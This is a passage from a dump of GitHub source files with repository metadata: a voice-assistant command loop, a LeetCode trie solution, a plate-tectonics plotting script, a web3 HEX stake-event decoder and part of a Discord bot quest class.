e:\n print(\"Say that again please...\")\n return \"None\"\n return query\n\n\ndef main():\n search_q = ['who is', 'what is', 'tell me about', 'show me about']\n bye_q = ['goodbye', 'turn off', 'shutdown', 'packup', 'bye', 'close']\n while True:\n query = input(\"Enter Command:- \").lower()\n # query = takecommand().lower()\n if \"google\" in query:\n web.start(query)\n\n elif \"time\" in query:\n speak(cloak.time())\n\n elif \"date\" in query:\n speak(cloak.date())\n elif 'search' in query:\n web.search(query)\n\n elif \"youtube\" in query:\n web.start(query)\n\n elif 'open' in query:\n\n file_open.File(query)\n\n elif 'how are you' in query:\n speak(\"Fine\")\n\n elif 'note' in query:\n qry = \" \"+' ' + '\\n' + f'{cloak.date()} ' + \\\n f'{cloak.time()}' + '\\n' + query[5:] + '\\n'\n with open(\"note.txt\", 'a') as file:\n file.writelines(qry)\n speak(\"Ok Boss\")\n\n elif 'nickname' in query:\n with open('nickname.txt', mode='r') as nick_file:\n name = nick_file.read()\n speak(f\"My nickname is {name}\")\n\n elif query in bye_q:\n speak(\"Good bye sir, see you soon\")\n quit()\n else:\n for item in search_q:\n if item in query:\n speak(\"Searching...\")\n web.search(query)\n\n for item in ['hi', 'hello']:\n if item in query:\n speak(\"Hello sir, How can I help you\")\n\n\na = SignUp()\n\nif a == True:\n\n Greetings()\n main()\n\n\nelif a == False:\n speak(\"Unauthenticated User\")\nelif a == \"Exit\":\n exit()\n","repo_name":"Dheeraj4103/Avatar2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"72462107188","text":"class Trie:\n def __init__(self):\n self.children: List[Trie | None] = [None] * 26\n self.ref: int = -1\n\n def insert(self, w: str, i: int):\n node = self\n for c in w:\n idx = ord(c) - ord(\"a\")\n if node.children[idx] is None:\n node.children[idx] = Trie()\n node = node.children[idx]\n node.ref = i\n\n def search(self, w: str) -> int:\n node = self\n for c in w:\n idx = ord(c) - ord(\"a\")\n if node.children[idx] is None:\n return -1\n node = node.children[idx]\n if node.ref != -1:\n return node.ref\n return -1\n\n\nclass Solution:\n def replaceWords(self, dictionary: List[str], sentence: str) -> str:\n trie = Trie()\n for i, w in enumerate(dictionary):\n trie.insert(w, i)\n ans = []\n for w in sentence.split():\n idx = trie.search(w)\n ans.append(dictionary[idx] if idx != -1 else w)\n return \" \".join(ans)\n","repo_name":"doocs/leetcode","sub_path":"solution/0600-0699/0648.Replace Words/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":25791,"dataset":"github-code","pt":"94"} +{"seq_id":"27697286303","text":"import os,sys\nimport pandas as pd\nimport numpy as np\nimport matplotlib.patheffects as PathEffects\nimport pyrot.reconstruction as pyrec\nfrom pyrot.rot import cart2latlon,cart2latlonrot,latlon2cart\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom geographiclib.geodesic import Geodesic\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter, AutoMinorLocator)\n\n\nmpl.rcParams.update(mpl.rcParamsDefault)\n#mpl.use(\"\")\nmpl.rcParams['svg.fonttype'] = 'none'\nmpl.rcParams['pdf.fonttype'] = 42\nmpl.rcParams['ps.fonttype'] = 42\n\ngeoid = Geodesic(6371.,0.)\n#xlims = [-20,20]\n#ylims = [-50,70]\nxlims = [-20,20]\nylims = [-90,60]\ntick_step = 10.\nfontsize = 18\n#rec_path = \"/home/kevin/Projects/DispursionOfHSAges/data/reconstructions/AGHJ06.csv\"\n#rec_path = \"/home/kevin/Projects/DispursionOfHSAges/data/reconstructions/PA_nhotspot_inversion.csv\"\ntimescale_file = \"/home/kevin/Projects/PySkew/raw_data/timescale_gradstein2012_all.txt\"\ntdf = pd.read_csv(timescale_file,sep=\"\\t\")\nprojection_age = 11.0\n#recs = [[[-14.37,51.27],\"India-Somalia\",\"tab:green\",\"./data/reconstructions/relrec/INSO_EH_rec.csv\"],[[-52.42,48.00],\"India-East Antarctica\",\"tab:pink\",\"./data/reconstructions/relrec/INAN_rec.csv\"],[[-60.68,12.17],\"Somalia-East Antarctica\",\"tab:purple\",\"./data/reconstructions/relrec/ANSO_rec.csv\"],[[-63.00,120.87],\"Australia-East Antarctica\",\"tab:orange\",\"./data/reconstructions/relrec/ANAU_rec.csv\"], [[-65.27,-19.96],\"South America-East Antarctica\",\"tab:cyan\",\"./data/reconstructions/relrec/SAAN_rec.csv\"]]#,[[],\"Antarctica-Nubia\",\"black\",\"./data/reconstructions/relrec/ANNB_rec.csv\"]]\n#recs = [[[-14.37,51.27],\"India-Somalia | Cande et al. 2010\",\"#97FA97\",\"./data/reconstructions/relrec/INSO_rec.csv\"],[[-14.37,51.27],\"India-Somalia | Copley et al. 2010\",\"tab:green\",\"./data/reconstructions/relrec/INSO_CPJV_rec.csv\"],[[-14.37,51.27],\"India-Somalia | Eagles and Hoang 2013\",\"#004400\",\"./data/reconstructions/relrec/INSO_EH_rec.csv\"]]\nrecs = [[[42.09,177.77],\"Vancouver-Pacific\",\"tab:red\",\"./data/reconstructions/relrec/PAVA_EByte_recs.csv\"],[[3.18, -153.67],\"Farallon-Pacific\",\"tab:blue\",\"./data/reconstructions/relrec/PAFR_EByte_recs.csv\"],[[-69.82,-101.487],\"West Antarctica-Pacific\",\"white\",\"./data/reconstructions/relrec/PAWAN_EByte_recs.csv\"]]\n#recs = [[[22.72,-156.63],\"Farallon-Pacific Molokai FZ\",\"#021828\",\"./data/reconstructions/relrec/PAFR_EByte_recs.csv\"],[[3.18, -153.67],\"Farallon-Pacific Clipperton FZ\",\"tab:blue\",\"./data/reconstructions/relrec/PAFR_EByte_recs.csv\"],[[-24.40,-151.14],\"Farallon-Pacific Austral FZ\",\"#9ACFF5\",\"./data/reconstructions/relrec/PAFR_EByte_recs.csv\"]]\n#[\"Pacific-Kula\",\"tab:cyan\",\"./data/reconstructions/relrec/PAKU_EByte_recs_cut.csv\"] #OLD PACIFIC KULA LINE\n#recs = [[[19+25/60,-(155+17/60)],\"Pacific-Hotspots\",\"tab:blue\",\"./data/reconstructions/PA_nhotspot_inversion.csv\"]]\n\n#ref_points_latlon = [[-0.134,-128.765],[15.16295753539516,-38.80131405142588],[-74.83642179968396,-38.27054899816777]] #Pacific Data (Azi = 74.837)\n#v = np.array([[-0.62612591, 0.75219207, 0.20536172],\n# [-0.77971846, -0.60480635, -0.16201359],\n# [-0.00233874, 0.26156523, -0.96518297]]) #Galapagos FZ Location\n#v = np.array([[-0.62612591, 0.660197 , -0.18767058],\n# [-0.77971846, -0.73054364, -0.38538909],\n# [-0.00233874, 0.17448758, -0.90346832]]) #Molokai FZ Location\n\nv = np.eye(3) #Null Rotation\ne = np.ones((3,))\n\n#pahs_rec = pyrec.PlateReconstruction.read_csv(recs[0][-1])\n#e,v = np.linalg.eig(pahs_rec[projection_age].to_cart_cov())\n#print(pahs_rec[projection_age].to_cart_cov())\n#idx = e.argsort()[::-1]\n#e = e[idx]\n#v = v[:,idx]\n\n# for j,vec in enumerate(v.T):\n# pole,_ = cart2latlon(*vec,np.zeros([3,3]))\n# if j==1 and \"AGHJ06\" in rec_path:\n# pole = [-pole[0],pole[1]-180]\n# cart,_ = latlon2cart(*pole,np.zeros([3,3]))\n# v[:,j] = cart\n# if j<2 and \"PA_nhotspot_inversion\" in rec_path:\n# pole = [-pole[0],pole[1]-180]\n# cart,_ = latlon2cart(*pole,np.zeros([3,3]))\n# v[:,j] = cart\n# print(pole)\n #import pdb; pdb.set_trace()\nprint(np.rad2deg(np.sqrt(e)))\nprint(v)\n\nfig = plt.figure(figsize=(16,9))\nax = fig.add_subplot(1, 1, 1)\nplt.tick_params(labelsize=fontsize)\n\n#import pdb; pdb.set_trace()\n\nfor ref_point,label,color,rec_path in recs:\n\n print(\"-----------------------------------------------------------------------\")\n print(rec_path)\n\n try:\n pahs_rec = pyrec.PlateReconstruction.read_csv(rec_path)\n except ValueError:\n pahs_rec = pyrec.PlateReconstruction.read_csv(rec_path,sep=\",\")\n\n ################################Eigen Correct output for AGHJ06\n #for pole in [[17.03,218.14],[-51.66,285.35],[-33.15,139.68]]:\n # cart,_ = latlon2cart(*pole,np.zeros([2,2]))\n # if pole[0]==17.03: v = cart\n # else: v = np.vstack([v,cart])\n #v = v.T\n #print(v)\n\n ################################Eigen Correct output for GWG20\n #for pole in [[19.44,-149.96],[-50.20,145.10],[33.15,-253.29]]:\n # cart,_ = latlon2cart(*pole,np.zeros([2,2]))\n # if pole[0]==19.44: v = cart\n # else: v = np.vstack([v,cart])\n #v = v.T\n #print(v)\n\n comps = np.array([])\n for i,rot in enumerate(pahs_rec.get_rrots()):\n# if int(rot.age_f%5): continue\n# if rot.age_f<30. or rot.age_f>55.: continue\n rv = np.rad2deg(v @ rot.to_cart())\n print(rot)\n print(rv)\n print(np.sqrt(rv[0]**2 + rv[1]**2 + rv[2]**2))\n# print(rot.age_f,np.rad2deg(rv))\n comp = rv\n# comp[1] = rot.age_f\n try:\n idx = tdf[tdf[\"base\"]==rot.age_f][\"chron\"].index\n name = tdf.loc[idx][\"chron\"].iloc[0]\n if \"r\" in name: name = tdf.loc[idx+1][\"chron\"].iloc[0].lstrip(\"C\").rstrip(\"n\")+\"y\"\n else: name = name.lstrip(\"C\").rstrip(\"n\")+\"o\"\n# txt = ax.text(comp[1], comp[0], \"%s\"%name, color=color, ha=\"right\", va=\"bottom\", fontsize=fontsize-6)\n# # txt = ax.text(comp[1], comp[0], r\"%.1f Ma\"%rot.age_f, color=color, ha=\"left\", va=\"bottom\", fontsize=fontsize-6)\n# txt.set_path_effects([PathEffects.withStroke(linewidth=3, foreground=\"k\", alpha=.7)])\n\n txt = ax.text(comp[1]+.3, comp[2], \"%s\"%name, color=color, ha=\"left\", va=\"center\", fontsize=fontsize-6)\n # txt = ax.text(comp[1], comp[2], r\"%.1f Ma\"%rot.age_f, color=color, ha=\"left\", va=\"bottom\", fontsize=fontsize-6)\n txt.set_path_effects([PathEffects.withStroke(linewidth=3, foreground=\"k\", alpha=.7)])\n except IndexError: pass\n if len(comps)==0: comps = comp\n else: comps = np.vstack([comps,comp])\n# if rot.age_f==47.349:\n# ax.plot(comps[-1,1], comps[-1,0], color=\"k\", marker=\"o\", linestyle=\"-\",zorder=100,mec=\"k\")\n# ax.plot(comps[-1,1], comps[-1,2], color=\"k\", marker=\"s\", linestyle=\"-\",zorder=100,mec=\"k\")\n\n# comps = comps/np.max(np.abs(comps),axis=0)\n# if \"EByte\" in rec_path: comps = comps[1:]\n print(comps)\n\n ##########################################################Plotting\n\n # Actual plotting\n ax.plot(comps[:,1], comps[:,0], color=color, marker=\"o\", linestyle=\"-\",zorder=2,label=label+\" X-Y\",mec=\"k\")\n ax.plot(comps[:,1], comps[:,0], color=\"k\", marker=None, linestyle=\"-\",zorder=1,linewidth=3)\n ax.plot(comps[:,1], comps[:,2], color=color, marker=\"s\", linestyle=\"-\",zorder=3,label=label+\" Z-Y\",mec=\"k\")\n ax.plot(comps[:,1], comps[:,2], color=\"k\", marker=None, linestyle=\"-\",zorder=1,linewidth=3)\n\n#ax.axvspan(47.4-1.,47.4+1.,color=\"tab:red\",alpha=.3,zorder=0)\n#ax.axvline(47.4,color=\"tab:red\",zorder=1)\n\nax.legend(facecolor=\"grey\",framealpha=.3,fontsize=14)\n\n# Move left y-axis and bottim x-axis to centre, passing through (0,0)\nax.spines['left'].set_position([\"data\",0.])\nax.spines['bottom'].set_position([\"data\",0.])\n\n# Eliminate upper and right axes\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\n# Show ticks in the left and lower axes only\nax.xaxis.set_ticks_position('bottom')\nax.yaxis.set_ticks_position('left')\n\nax.set_xticks(list(np.arange(xlims[0],0,tick_step))+list(np.arange(tick_step,xlims[1]+tick_step,tick_step)))\nax.set_yticks(list(np.arange(ylims[0],0,tick_step))+list(np.arange(tick_step,ylims[1]+tick_step,tick_step)))\n#ax.set_xlim(xlims)\n#ax.set_ylim(ylims)\n\nxlabel = ax.set_xlabel(r\"Y\",fontsize=fontsize)\n#ylabel = ax.set_ylabel(r\"$\\hat{w}_{max},\\hat{w}_{min}$\",rotation=0.,fontsize=fontsize)\nticklab = ax.yaxis.get_ticklabels()[0]\ntrans = ticklab.get_transform()\nax.yaxis.set_label_coords(0., ylims[1] + 1., transform=trans)\nax.text(0.1, ylims[1] + 4.5, r\"Z\", color=\"black\", transform=trans, ha=\"left\", fontsize=fontsize)\nax.text(0., ylims[1] + 4.5, r\",\", color=\"black\", transform=trans, ha=\"center\", fontsize=fontsize)\nax.text(-0.1, ylims[1] + 4.5, r\"X\", color=\"black\", transform=trans, ha=\"right\", fontsize=fontsize)\n\nticklab = ax.xaxis.get_ticklabels()[0]\ntrans = ticklab.get_transform()\nax.xaxis.set_label_coords(xlims[1] + 2., 1., transform=trans)\n#ax.set_title(\"Pacific Basin Finite Rotation Vector Endpoints\",fontsize=fontsize+4)\n\n #ticklab = ax.yaxis.get_ticklabels()[0]\n #trans = ticklab.get_transform()\n #ax.yaxis.set_label_coords(0., ylims[1] + 1., transform=trans)\n\nfig.savefig(\"./results/vector_endpoint_%.1f.png\"%projection_age,transparent=True)\nfig.savefig(\"./results/vector_endpoint_%.1f.pdf\"%projection_age,transparent=True)\nfig.savefig(\"./results/vector_endpoint_%.1f.svg\"%projection_age,transparent=True)\n\n\n\n####################################################################RATES\n\nfig = plt.figure(figsize=(16,9))\nax = fig.add_subplot(1, 1, 1)\nplt.tick_params(which=\"major\",labelsize=fontsize, length=8)\n\nfor ref_point,label,color,rec_path in recs:\n\n try:\n pahs_rec = pyrec.PlateReconstruction.read_csv(rec_path)\n except ValueError:\n pahs_rec = pyrec.PlateReconstruction.read_csv(rec_path,sep=\",\")\n\n rot_rate,age = [],[]\n for i,rot in enumerate(pahs_rec.get_srots()):\n geodict = geoid.Inverse(*ref_point,rot.lat,rot.lon)\n rad_dis = np.deg2rad(geodict[\"a12\"])\n if \"PAVA\" in rec_path and rot.age_i==52.62: rot_rate += [np.nan,np.nan]#rot_rate += [abs(83.7895*np.sin(rad_dis)),abs(83.7895*np.sin(rad_dis))]\n# elif \"rec\" in os.path.basename(rec_path): rot_rate += [abs(111.113*rot.wr*np.sin(rad_dis)),abs(111.113*rot.wr*np.sin(rad_dis))]\n# else: rot_rate += [abs(2*111.113*rot.wr*np.sin(rad_dis)),abs(2*111.113*rot.wr*np.sin(rad_dis))]\n else: rot_rate += [abs(111.113*rot.wr*np.sin(rad_dis)),abs(111.113*rot.wr*np.sin(rad_dis))]\n age += [rot.age_i,rot.age_f]\n# if geodict[\"azi1\"]+90>180 or geodict[\"azi1\"]+90<0: geodict[\"azi1\"] = (180+geodict[\"azi1\"])%360\n# new_ref_geo = geoid.ArcDirect(*ref_point, geodict[\"azi1\"]+90, abs(rot.wr*np.sin(rad_dis)))\n# ref_point = [new_ref_geo[\"lat2\"],new_ref_geo[\"lon2\"]]\n\n print(rot.age_i,rot.age_f,111.113*rot.wr,rot_rate[-1],geodict[\"azi1\"]+90,ref_point)\n\n nlat,nlon,_,_ = rot.rotate(*ref_point)\n ref_point = (nlat,nlon)\n\n print(\"NEW REF:\", ref_point)\n\n if age[0]==0.: age,rot_rate = age[2:],rot_rate[2:]\n if rot_rate[0]==0.: age,rot_rate = age[1:],rot_rate[1:]\n\n print(np.array([age,rot_rate]).T)\n\n ax.plot(age,rot_rate,color=color,label=label,zorder=3)\n ax.plot(age,rot_rate,color=\"k\",linewidth=3,zorder=2)\n\nylim = ax.get_ylim()\nax.axvspan(47.4-1.,47.4+1.,10/(ylim[1]+10),1.,color=\"tab:red\",alpha=.3,zorder=1,label=\"Coeval Bend Age\")\nax.axvline(47.4,10/(ylim[1]+10),1.,color=\"tab:red\",zorder=5,linewidth=2)\n\nfor i,row in tdf.iterrows():\n name = row[\"chron\"]\n# if \"r\" in name: name = tdf.loc[idx+1][\"chron\"].iloc[0].lstrip(\"C\").rstrip(\"n\")+\"y\"\n# else: name = name.lstrip(\"C\").rstrip(\"n\")+\"o\"\n# if row[\"top\"]<10 or row[\"top\"]>84: continue\n if \"n\" in row[\"chron\"]: color,oth_color=\"k\",\"w\"\n else: color,oth_color=\"w\",\"k\"\n ax.bar(row[\"top\"],-10.,row[\"base\"]-row[\"top\"],align=\"edge\",color=color,zorder=0)\n\n if name in [\"C33r\",\"C33n\",\"C32n.2n\",\"C31r\",\"C30n\",\"C26r\",\"C24r\",\"C21n\",\"C20r\",\"C12r\"]:\n txt = ax.text((row[\"base\"]+row[\"top\"])/2, -5, \"%s\"%(name).strip(\"C\").split(\".\")[0], color=oth_color, ha=\"center\", va=\"center\", fontsize=fontsize-7)\n# txt.set_path_effects([PathEffects.withStroke(linewidth=3, foreground=\"k\", alpha=.7)])\n\nax.plot([11.056,83.64],[0.,0.],color=\"k\")\n\nax.set_xlim(83.64,11.056)\nax.set_ylim(-10,ylim[1])\nax.set_xlabel(\"Age (Ma)\",fontsize=fontsize)\nax.set_ylabel(\"Spreading Rate (mm/a)\",fontsize=fontsize)\nax.yaxis.set_minor_locator(MultipleLocator(5))\nax.xaxis.set_minor_locator(MultipleLocator(1))\nax.xaxis.set_major_locator(MultipleLocator(5))\nax.tick_params(which='minor', color='k', length=4)\n\nax.legend(facecolor=\"grey\",framealpha=.3,fontsize=14)\nax.set_title(\"Pacific Ocean Basin Spreading Rates\",fontsize=fontsize+4)\n\nfig.savefig(\"./results/vector_rates_%.1f.png\"%projection_age,transparent=True)\nfig.savefig(\"./results/vector_rates_%.1f.pdf\"%projection_age,transparent=True)\n\nplt.show()\n","repo_name":"Rice-Tectonics-Group/Quantification-of-PacificPlate-Hotspot-Tracks","sub_path":"src/vector_endpoint_plot_all_recs.py","file_name":"vector_endpoint_plot_all_recs.py","file_ext":"py","file_size_in_byte":13036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71644582070","text":"import time\nimport json\nfrom web3.auto.infura import w3\nfrom typing import List\n\nHEX_CONTRACT_ADDRESS = '0x2b591e99afE9f32eAA6214f7B7629768c40Eeb39'\nwith open('HEX/abi.json') as json_data:\n ABI = json.load(json_data)\n\nDAYS_TO_SECONDS=24*60*60\nSECONDS_TO_DAYS=1/DAYS_TO_SECONDS\n\nHEX_LAUNCH_TIME=1575331200\nHEX_TO_HEARTS = 1e8\nTSHARES_TO_SHARES = 1e12\n\n\nclass HEX_Stake:\n def __init__(self, stakeId):\n self.stakeId = stakeId\n self.timestampStart = None # stakeStart\n self.timestampUnlock = None # good accounting - None if stake not yet unlocked\n self.timestampEnd = None # stakeEnd - None if stake not yet ended\n self.stakedHearts = None # common\n self.stakeShares = None # common\n self.lockedDay = None # good accounting or stakeEnd\n self.stakedDays = None # stakeStart\n self.isAutoStake = None # stakeStart\n self.payout = None # good accounting or stakeEnd\n self.penalty = None # good accounting or stakeEnd\n\n self.unlockedDay = None # locally caluclated\n self.income = None # locally caluclated (payout - penalty)\n\n @staticmethod\n def hearts_to_hex(hearts):\n return hearts / HEX_TO_HEARTS\n\n @staticmethod\n def shares_to_tshares(shares):\n return shares / TSHARES_TO_SHARES\n\n def __str__(self):\n return \"Stake ID: \" + str(self.stakeId) + \"\\n\" + \\\n \"Stake submitted: \" + (time.strftime(\"%Y-%m-%d %H:%M:%S %Z %z\", time.localtime(self.timestampStart)) if self.timestampStart else \"0-0-0 0:0:0\") + \"\\n\" + \\\n \"Staked Hex: \" + str(self.hearts_to_hex(self.stakedHearts)) + \"\\n\" + \\\n (\"Interests HEX: \" + str(self.hearts_to_hex(self.payout)) + \"\\n\" if self.payout else \"\" ) + \\\n (\"Penalty HEX: \" + str(self.penalty/1e8) + \"\\n\" if self.penalty else \"\" ) + \\\n (\"Income HEX: \" + str(self.hearts_to_hex(self.income)) + \"\\n\" if self.income else \"\" ) + \\\n \"Staked TShares: \" + str(self.shares_to_tshares(self.stakeShares)) + \"\\n\" + \\\n \"Staked Days: \" + str(self.stakedDays) + \"\\n\" + \\\n \"Locked Day: \" + str(self.lockedDay) + \"\\n\" + \\\n \"Unlocked Day: \" + str(self.unlockedDay) + \"\\n\" + \\\n \"Is Auto Stake: \" + str(self.isAutoStake) + \"\\n\" \\\n \"Stake withdrew: \" + (time.strftime(\"%Y-%m-%d %H:%M:%S %Z %z\", time.localtime(self.timestampEnd)) if self.timestampEnd else \"0-0-0 0:0:0\") + \"\\n\"\n\n \n def processStakeStartData(self, stakeData0):\n \"\"\"\n Process byte data returned by StakeStart event\n \"\"\"\n # https://etherscan.io/address/0x2b591e99afe9f32eaa6214f7b7629768c40eeb39#code#L606\n # StakeStart (auto-generated event):\n # uint40 timestamp --> data0 [ 39: 0]\n # address indexed stakerAddr\n # uint40 indexed stakeId\n # uint72 stakedHearts --> data0 [111: 40]\n # uint72 stakeShares --> data0 [183:112]\n # uint16 stakedDays --> data0 [199:184]\n # bool isAutoStake --> data0 [207:200]\n\n self.timestampStart = stakeData0 & (2**40-1)\n self.stakedHearts = (stakeData0 >> 40) & (2**72-1)\n self.stakeShares = (stakeData0 >> 112) & (2**72-1)\n self.stakedDays = (stakeData0 >> 184) & (2**16-1)\n self.isAutoStake = (stakeData0 >> 200) & (2**1-1)\n self.lockedDay = round((self.timestampStart - HEX_LAUNCH_TIME) * SECONDS_TO_DAYS + .5)+1 #since HEX launch, day 0 is day 1, stake is assumed to start at the end of day\n\n def processStakeGoodAccountData(self, stakeData0, stakeData1):\n \"\"\"\n Process byte data returned by Good Accounting event\n \"\"\"\n # https://etherscan.io/address/0x2b591e99afe9f32eaa6214f7b7629768c40eeb39#code#L587\n # StakeGoodAccounting(auto-generated event)\n # uint40 timestamp --> data0 [ 39: 0]\n # address indexed stakerAddr\n # uint40 indexed stakeId\n # uint72 stakedHearts --> data0 [111: 40]\n # uint72 stakeShares --> data0 [183:112]\n # uint72 payout --> data0 [255:184]\n # uint72 penalty --> data1 [ 71: 0]\n # address indexed senderAddr\n \n self.timestampUnlock = stakeData0 & (2**40-1)\n self.stakedHearts = (stakeData0 >> 40) & (2**72-1)\n self.stakeShares = (stakeData0 >> 112) & (2**72-1)\n self.payout = (stakeData0 >> 184) & (2**72-1)\n self.penalty = stakeData1 & (2**72-1)\n\n self.unlockedDay = round((self.timestampUnlock - HEX_LAUNCH_TIME) * SECONDS_TO_DAYS + .5)+1 #since HEX launch, day 0 is day 1, stake is assumed to start at the end of day\n\n def processStakeEndData(self, stakeData0, stakeData1):\n \"\"\"\n Process byte data returned by StakeEnd event\n \"\"\"\n # https://etherscan.io/address/0x2b591e99afe9f32eaa6214f7b7629768c40eeb39#code#L571\n # StakeEnd (auto-generated event)\n # uint40 timestamp --> data0 [ 39: 0]\n # address indexed stakerAddr\n # uint40 indexed stakeId\n # uint72 stakedHearts --> data0 [111: 40]\n # uint72 stakeShares --> data0 [183:112]\n # uint72 payout --> data0 [255:184]\n # uint72 penalty --> data1 [ 71: 0]\n # uint16 servedDays --> data1 [ 87: 72]\n # bool prevUnlocked --> data1 [ 95: 88]\n\n self.timestampEnd = stakeData0 & (2**40-1)\n self.stakedHearts = (stakeData0 >> 40) & (2**72-1)\n self.stakeShares = (stakeData0 >> 112) & (2**72-1)\n self.payout = (stakeData0 >> 184) & (2**72-1)\n self.penalty = stakeData1 & (2**72-1)\n self.servedDays = (stakeData1 >> 72) & (2**16-1)\n self.prevUnlocked = (stakeData1 >> 88) & (2**1-1)\n\n if self.prevUnlocked:\n self.unlockedDay = round((self.timestampEnd - HEX_LAUNCH_TIME) * SECONDS_TO_DAYS + .5)+1 #since HEX launch, day 0 is day 1, stake is assumed to start at the end of day\n else:\n self.timestampUnlock = self.timestampEnd #populate timestampUnlock with timestampEnd since unlocking is happening at the same time as the stake ends\n \n self.income = self.payout - self.penalty #for tax purposes, income is registered at the stakeEnd only\n\nclass HEX_Contract:\n def __init__(self):\n self.hex_ = w3.eth.contract(HEX_CONTRACT_ADDRESS, abi=ABI)\n print(\"ERC20 contract found:\" + self.hex_.functions.name().call() + \" (\" + self.hex_.address + \")\")\n\n def read_stake_count(self, walletAddress):\n \"\"\"\n Read the stake count of an address from the contract function\n \"\"\"\n return self.hex_.functions.stakeCount(walletAddress).call()\n\n def read_stake_by_index(self, walletAddress, index): \n \"\"\"\n Read the (limited) stake data for wallet address from the contract function\n #index is 0 to stake_count-1\n \"\"\"\n stakeId, stakedHearts, stakeShares, lockedDay, stakedDays, unlockedDay, isAutoStake \\\n = self.hex_.functions.stakeLists(walletAddress, index).call()\n staked_HEX = HEX_Stake.hearts_to_hex(stakedHearts)\n stakedTShares = HEX_Stake.shares_to_tshares(stakeShares)\n lockedDate = time.localtime(HEX_LAUNCH_TIME + stakedDays*DAYS_TO_SECONDS)\n \n stake = HEX_Stake(stakeId)\n stake.stakedHearts = staked_HEX\n stake.stakeShares = stakedTShares\n stake.lockedDay = lockedDay\n stake.stakedDays = stakedDays\n stake.unlockedDay = unlockedDay\n stake.isAutoStake = isAutoStake\n return stake\n\n def find_all_address_stakes(self, address):\n \"\"\"\n Find the (verbose) data for all stakes of an address\n \"\"\"\n stakeStartedEventsForAddress=self.hex_.events.StakeStart.createFilter(fromBlock=0, argument_filters={'stakerAddr': address}).get_all_entries()\n \n all_stakes = [] # type: List[HEX_Stake]\n for event in stakeStartedEventsForAddress:\n stakeId = event['args']['stakeId']\n stakeData0 = event['args']['data0']\n stake = HEX_Stake(stakeId)\n stake.processStakeStartData(stakeData0)\n\n stakeGoodAccountEventsForAddress=self.hex_.events.StakeEnd.createFilter(fromBlock=0, argument_filters={'stakerAddr': address}).get_all_entries()\n for event in stakeGoodAccountEventsForAddress:\n if event['args']['stakeId'] == stakeId:\n stakeData0 = event['args']['data0']\n stakeData1 = event['args']['data1']\n stake.processStakeGoodAccountData(stakeData0, stakeData1)\n break\n\n stakeEndedEventsForAddress=self.hex_.events.StakeEnd.createFilter(fromBlock=0, argument_filters={'stakerAddr': address}).get_all_entries()\n for event in stakeEndedEventsForAddress:\n if event['args']['stakeId'] == stakeId:\n stakeData0 = event['args']['data0']\n stakeData1 = event['args']['data1']\n stake.processStakeEndData(stakeData0, stakeData1)\n break\n\n all_stakes.append(stake)\n return all_stakes\n","repo_name":"dzid26/HEX_stake_importer","sub_path":"HEX/hex_api.py","file_name":"hex_api.py","file_ext":"py","file_size_in_byte":9495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31385954123","text":"import json\nimport random\nfrom collections import defaultdict, namedtuple\nfrom typing import Dict, List\nimport math\nimport asyncio\n\nimport discord\nimport jsonpickle\n\nfrom ..util import SlotPickleMixin\nfrom .. import dbconn\nfrom .. import util\nfrom ..game import players\nfrom ..game import weapons\nfrom ..game.helpers.misc import DueUtilObject, DueMap\nfrom .players import Player\nfrom . import gamerules\n\nquest_map = DueMap()\n\nMIN_QUEST_IV = 0\nQUEST_DAY = 86400\nQUEST_COOLDOWN = 360\nMAX_DAILY_QUESTS = 50\nMAX_ACTIVE_QUESTS = 10\n\n\nclass Quest(DueUtilObject, SlotPickleMixin):\n \"\"\"A class to hold info about a server quest\"\"\"\n\n __slots__ = [\"server_id\", \"created_by\",\n \"task\", \"w_id\", \"spawn_chance\", \"image_url\",\n \"base_attack\", \"base_strg\", \"base_accy\", \"base_hp\",\n \"channel\", \"times_beaten\"]\n\n DEFAULT_IMAGE = \"http://i.imgur.com/zOIJM9T.png\"\n\n _BaseStats = namedtuple(\"BaseStats\", [\"attack\", \"strg\", \"accy\", \"hp\"])\n\n def __init__(self, name, base_attack, base_strg, base_accy, base_hp, **extras):\n message = extras.get('ctx', None)\n given_spawn_chance = extras.get('spawn_chance', 4)\n\n if message is not None:\n if message.server in quest_map:\n if name.lower() in quest_map[message.server]:\n raise util.DueUtilException(message.channel, \"A foe with that name already exists on this server!\")\n\n if base_accy < 1 or base_attack < 1 or base_strg < 1:\n raise util.DueUtilException(message.channel, \"No quest stats can be less than 1!\")\n\n if base_hp < 30:\n raise util.DueUtilException(message.channel, \"Base HP must be at least 30!\")\n\n if len(name) > 30 or len(name) == 0 or name.strip == \"\":\n raise util.DueUtilException(message.channel, \"Quest names must be between 1 and 30 characters!\")\n\n if given_spawn_chance < 1 or given_spawn_chance > 25:\n raise util.DueUtilException(message.channel, \"Spawn chance must be between 1 and 25%!\")\n\n self.server_id = message.server.id\n self.created_by = message.author.id\n else:\n self.server_id = extras.get('server_id', \"DEFAULT\")\n self.created_by = \"\"\n\n self.name = name\n super().__init__(self._quest_id(), **extras)\n self.task = extras.get('task', \"Battle a\")\n self.w_id = extras.get('weapon_id', weapons.NO_WEAPON_ID)\n self.spawn_chance = given_spawn_chance / 100\n self.image_url = extras.get('image_url', Quest.DEFAULT_IMAGE)\n self.base_attack = base_attack\n self.base_strg = base_strg\n self.base_accy = base_accy\n self.base_hp = base_hp\n self.channel = extras.get('channel', \"ALL\")\n self.times_beaten = 0\n self._add()\n self.save()\n\n def _quest_id(self):\n return self.server_id + '/' + self.name.lower()\n\n def _add(self):\n global quest_map\n if self.server_id != \"\":\n quest_map[self.id] = self\n\n def base_values(self):\n return self._BaseStats(self.base_attack, self.base_strg,\n self.base_accy, self.base_hp, )\n\n def get_channel_mention(self, server):\n if self.channel in (\"ALL\", \"NONE\"):\n return self.channel.title()\n else:\n channel = server.get_channel(self.channel)\n if channel is None:\n return \"``Deleted``\"\n else:\n return channel.mention\n\n @property\n def made_on(self):\n return self.server_id\n\n @property\n def creator(self):\n creator = players.find_player(self.created_by)\n if creator is not None:\n return creator.name\n else:\n return \"Unknown\"\n\n @property\n def q_id(self):\n return self.id\n\n @property\n def 